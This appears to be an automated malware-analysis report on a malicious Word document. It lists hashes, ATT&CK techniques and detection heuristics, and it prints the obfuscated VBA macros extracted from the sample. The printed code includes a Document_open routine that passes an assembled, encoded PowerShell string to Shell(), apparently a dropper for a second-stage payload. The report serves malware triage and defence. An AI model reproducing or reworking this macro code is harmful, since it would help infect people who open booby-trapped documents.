Office (OLE) malware analysis — malicious · de00b45332a9eab8

MALICIOUS

Office (OLE)

114.2 KB Created: 2018-06-19 06:36:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: 2353dc9d44e3f3fcff9dcaf192adf40c SHA-1: d27b94a0dac5abe1f17dba6a985fda0a16dfb1cc SHA-256: de00b45332a9eab8d8280078dc1cee3e327149f7d8d7646aca40fb4a1c82bb0b

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro triggers a 'Shell()' call, which is highly indicative of malicious intent. The VBA code attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload. The specific PowerShell command constructed is 'powershell', which is a critical indicator.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14645 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14645 bytes
SHA-256: `d16475ab1be8bc14443220102947a189e69c0c57f58f47d19759b3692c3d4b49`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "GXfzSDiOmJqOD" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function EQLbrLXo() On Error Resume Next PMkYiM = CDate(75501) jdtWH = 48982 oYjIw = CByte(PuUln) kzljH = YrsTT rwvFq = CDate(zolcH + Sin(14440 + 60812) * 42271 * CInt(17993)) zEOJUP = 46860 MWiJo = CDate(62034) dbStLb = 18717 djEtDa = CByte(haDCXa) mYQhjR = AQYOv zmQzT = CDate(IfrXjK + Sin(62928 + 26008) * 24105 * CInt(30441)) Cmddj = 87611 DwDHu = CDate(69757) vktfBi = 60251 NtqAG = CByte(XQPjO) OoCiWN = SYjzhm VuhDhS = CDate(iCikfA + Sin(73196 + 81878) * 76359 * CInt(43347)) RCJbfq = 18848 fUsAOw = CDate(54980) iiVliB = 26179 NJjZjv = CByte(qXTGOu) EVXSE = jvmmw HjYhJ = CDate(JlivE + Sin(78467 + 43603) * 80527 * CInt(1322)) simPG = 97365 EQLbrLXo = wLwXHw + Chr$(SIHlauLvzwV + 80 + GOzYkkiSt) + "OwerSH" + OPHsNR + iRkYfXRqzjC + PIUJQBL + whDkhIGTl + vSjADwYE + cSmVuWjiRzw + niEzOU vwduX = CDate(48506) ABwlG = 63580 kKJGVp = CByte(jvsaK) ljQJf = jupwo sEIpi = CDate(oAKFj + Sin(34152 + 72033) * 33904 * CInt(53621)) DYDOj = 44621 hUOAlj = CDate(66037) jBUXzB = 38200 pIIYs = CByte(XrOGP) vmjjp = RtMMn lBVkOX = CDate(XQITIL + Sin(79667 + 88199) * 72129 * CInt(62913)) mNSXk = 76530 End Function Function XJjvnpd(NPbjQYk) On Error Resume Next TVLjj = CDate(93213) XKUYAa = 12395 HSradT = CByte(ovQEM) lKAZZ = GfbbE FpoEG = CDate(JNaOfG + Sin(66951 + 41366) * 18728 * CInt(51680)) JoQikh = 34016 iWEYQ = CDate(49721) mUfKzN = 63275 wdrJuq = CByte(ZvwjSi) uTqrio = zvNpI bwosz = CDate(QfqZLq + Sin(41284 + 63775) * 95280 * CInt(69336)) bwHWX = 60950 wznOmZjDw = wBiGVSdlG + Shell(azbnI + NPbjQYk + YNcufTpNoq, 67862 - 67862) nsCUa = CDate(42715) RwHhu = 10027 UcMrh = CByte(KdzjXs) IWuzz = ziWPY wOjzKR = CDate(cwLJzd + Sin(34481 + 62312) * 43481 * CInt(66257)) nGYUXF = 87114 End Function Private Sub Document_open() On Error Resume Next LAfvS = CDate(6602) hPFif = 71984 ZPrHW = CByte(wSzqB) iICao = YdWqiN YCZJu = CDate(dUotRM + Sin(34315 + 27477) * 97209 * CInt(48435)) TnfcN = 43280 AfXkv = CDate(13862) Fzjtw = 20384 iijAM = CByte(QRJAcj) pVmlCd = zdHzaZ ZijpBc = CDate(JjbJc + Sin(58272 + 29395) * 79986 * CInt(99390)) zrYzEz = 88236 Application.Run HaqvcTnmaU + "XJjvnpd" + iwzHj, IAXzFBASbC + EQLbrLXo + iLRSf XUYjHj = CDate(21966) kCGkir = 479 zLfkv = CByte(UAWAC) AYXYcD = EcQdXd FPlCtp = CDate(kiSvmz + Sin(47886 + 16238) * 77869 * CInt(89381)) jPzja = 56499 UGHpt = CDate(12357) FokVEF = 31195 wLkoRf = CByte(NjnhHo) VtCSw = VCtTdN ZYORwu = CDate(nDXziO + Sin(58600 + 8702) * 88024 * CInt(66432)) MJGYm = 42049 End Sub Attribute VB_Name = "TlCZdPjdai" Function OPHsNR() On Error Resume Next fBUOAv = 79260 NhBVOa = CDate(pbzUO + Sin(47616 + 41139) * 52263 * CInt(37630)) EnnHbc = 96412 YWGnKT = jVitz zzmmb = CByte(rLhPa) rhIQb = CDate(23979) EJvlAUWESRa = "ell" + " " + "( ( " + "26,107 , 87," + " 113,73 ,8" YLKXQM = 23999 RtwVwA = CDate(vQuGM + Sin(62472 + 37866) * 72247 * CInt(55875)) hQiZkz = 33752 NLihGY = VpfPn CtQNf = CByte(EGADOc) swXriv = CDate(64907) GEOhIbGJBi = "7, 30" + ",3 ,30,80 , 91" + ", 73,19 ,81 , 9" + "2 , 84" + ", 91 , 9" + "3 " + ", 7" hstKkI = 14459 hHimLr = CDate(ToXWPG + Sin(9906 + 65344) * 13930 * CInt(10040)) wRiAp = 46703 YMhffZ = jsYYwB HYKuH = CByte(jztKV) zIUvIk = CDate(23855) SauVKvWi = "4 ," + " 30, 76" + ", 95 ,80, 90,81" + " ,83,5 , 26 ,11" + "8 ,124," + " 86" + " ," + "93 ,110,30, 3" + ",30 , 80," QpQKWo = 12019 hRjKH = CDate(QUJlX + Sin(4519 + 95755) * 95064 * CInt(21367)) UASnp = 47073 lowIj = jPDRh uaNpQM = CByte(JCbJIi) HvpVWS = CDate(78978) QYCbljnrL = " 91 ,7" + "3,19,81, 92,84" + " ,91 " + ", 93,74" vIGEcs = 64399 ITkNZD = CDate(zfjTP + Sin(98557 + 15410) * 17753 * CInt(60023)) OnzhI = 7011 QXlnRj = IilKs XkcBK = CByte(hjiWjp) lQGqp = CDate(90934) DmAwsu = ", 30,1" + "09 ," + "71 " + ", 77 ,74" ... (truncated)

SHA-256: d16475ab1be8bc14443220102947a189e69c0c57f58f47d19759b3692c3d4b49

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "GXfzSDiOmJqOD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function EQLbrLXo()
On Error Resume Next
PMkYiM = CDate(75501)
jdtWH = 48982
oYjIw = CByte(PuUln)
kzljH = YrsTT
rwvFq = CDate(zolcH + Sin(14440 + 60812) * 42271 * CInt(17993))
zEOJUP = 46860
MWiJo = CDate(62034)
dbStLb = 18717
djEtDa = CByte(haDCXa)
mYQhjR = AQYOv
zmQzT = CDate(IfrXjK + Sin(62928 + 26008) * 24105 * CInt(30441))
Cmddj = 87611
DwDHu = CDate(69757)
vktfBi = 60251
NtqAG = CByte(XQPjO)
OoCiWN = SYjzhm
VuhDhS = CDate(iCikfA + Sin(73196 + 81878) * 76359 * CInt(43347))
RCJbfq = 18848
fUsAOw = CDate(54980)
iiVliB = 26179
NJjZjv = CByte(qXTGOu)
EVXSE = jvmmw
HjYhJ = CDate(JlivE + Sin(78467 + 43603) * 80527 * CInt(1322))
simPG = 97365
EQLbrLXo = wLwXHw + Chr$(SIHlauLvzwV + 80 + GOzYkkiSt) + "OwerSH" + OPHsNR + iRkYfXRqzjC + PIUJQBL + whDkhIGTl + vSjADwYE + cSmVuWjiRzw + niEzOU
vwduX = CDate(48506)
ABwlG = 63580
kKJGVp = CByte(jvsaK)
ljQJf = jupwo
sEIpi = CDate(oAKFj + Sin(34152 + 72033) * 33904 * CInt(53621))
DYDOj = 44621
hUOAlj = CDate(66037)
jBUXzB = 38200
pIIYs = CByte(XrOGP)
vmjjp = RtMMn
lBVkOX = CDate(XQITIL + Sin(79667 + 88199) * 72129 * CInt(62913))
mNSXk = 76530
End Function
Function XJjvnpd(NPbjQYk)
On Error Resume Next
TVLjj = CDate(93213)
XKUYAa = 12395
HSradT = CByte(ovQEM)
lKAZZ = GfbbE
FpoEG = CDate(JNaOfG + Sin(66951 + 41366) * 18728 * CInt(51680))
JoQikh = 34016
iWEYQ = CDate(49721)
mUfKzN = 63275
wdrJuq = CByte(ZvwjSi)
uTqrio = zvNpI
bwosz = CDate(QfqZLq + Sin(41284 + 63775) * 95280 * CInt(69336))
bwHWX = 60950
wznOmZjDw = wBiGVSdlG + Shell(azbnI + NPbjQYk + YNcufTpNoq, 67862 - 67862)
nsCUa = CDate(42715)
RwHhu = 10027
UcMrh = CByte(KdzjXs)
IWuzz = ziWPY
wOjzKR = CDate(cwLJzd + Sin(34481 + 62312) * 43481 * CInt(66257))
nGYUXF = 87114
End Function
Private Sub Document_open()
On Error Resume Next
LAfvS = CDate(6602)
hPFif = 71984
ZPrHW = CByte(wSzqB)
iICao = YdWqiN
YCZJu = CDate(dUotRM + Sin(34315 + 27477) * 97209 * CInt(48435))
TnfcN = 43280
AfXkv = CDate(13862)
Fzjtw = 20384
iijAM = CByte(QRJAcj)
pVmlCd = zdHzaZ
ZijpBc = CDate(JjbJc + Sin(58272 + 29395) * 79986 * CInt(99390))
zrYzEz = 88236
Application.Run HaqvcTnmaU + "XJjvnpd" + iwzHj, IAXzFBASbC + EQLbrLXo + iLRSf
XUYjHj = CDate(21966)
kCGkir = 479
zLfkv = CByte(UAWAC)
AYXYcD = EcQdXd
FPlCtp = CDate(kiSvmz + Sin(47886 + 16238) * 77869 * CInt(89381))
jPzja = 56499
UGHpt = CDate(12357)
FokVEF = 31195
wLkoRf = CByte(NjnhHo)
VtCSw = VCtTdN
ZYORwu = CDate(nDXziO + Sin(58600 + 8702) * 88024 * CInt(66432))
MJGYm = 42049
End Sub


Attribute VB_Name = "TlCZdPjdai"
Function OPHsNR()
On Error Resume Next
fBUOAv = 79260
NhBVOa = CDate(pbzUO + Sin(47616 + 41139) * 52263 * CInt(37630))
EnnHbc = 96412
YWGnKT = jVitz
zzmmb = CByte(rLhPa)
rhIQb = CDate(23979)
EJvlAUWESRa = "ell" + "  " + "( ( " + "26,107 , 87," + " 113,73 ,8"
YLKXQM = 23999
RtwVwA = CDate(vQuGM + Sin(62472 + 37866) * 72247 * CInt(55875))
hQiZkz = 33752
NLihGY = VpfPn
CtQNf = CByte(EGADOc)
swXriv = CDate(64907)
GEOhIbGJBi = "7, 30" + ",3 ,30,80 , 91" + ", 73,19 ,81 , 9" + "2 , 84" + ", 91 , 9" + "3 " + ", 7"
hstKkI = 14459
hHimLr = CDate(ToXWPG + Sin(9906 + 65344) * 13930 * CInt(10040))
wRiAp = 46703
YMhffZ = jsYYwB
HYKuH = CByte(jztKV)
zIUvIk = CDate(23855)
SauVKvWi = "4 ," + " 30, 76" + ", 95 ,80, 90,81" + " ,83,5 , 26 ,11" + "8 ,124," + " 86" + " ," + "93 ,110,30, 3" + ",30 , 80,"
QpQKWo = 12019
hRjKH = CDate(QUJlX + Sin(4519 + 95755) * 95064 * CInt(21367))
UASnp = 47073
lowIj = jPDRh
uaNpQM = CByte(JCbJIi)
HvpVWS = CDate(78978)
QYCbljnrL = " 91 ,7" + "3,19,81, 92,84" + " ,91 " + ", 93,74"
vIGEcs = 64399
ITkNZD = CDate(zfjTP + Sin(98557 + 15410) * 17753 * CInt(60023))
OnzhI = 7011
QXlnRj = IilKs
XkcBK = CByte(hjiWjp)
lQGqp = CDate(90934)
DmAwsu = ", 30,1" + "09 ," + "71 " + ", 77 ,74" 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.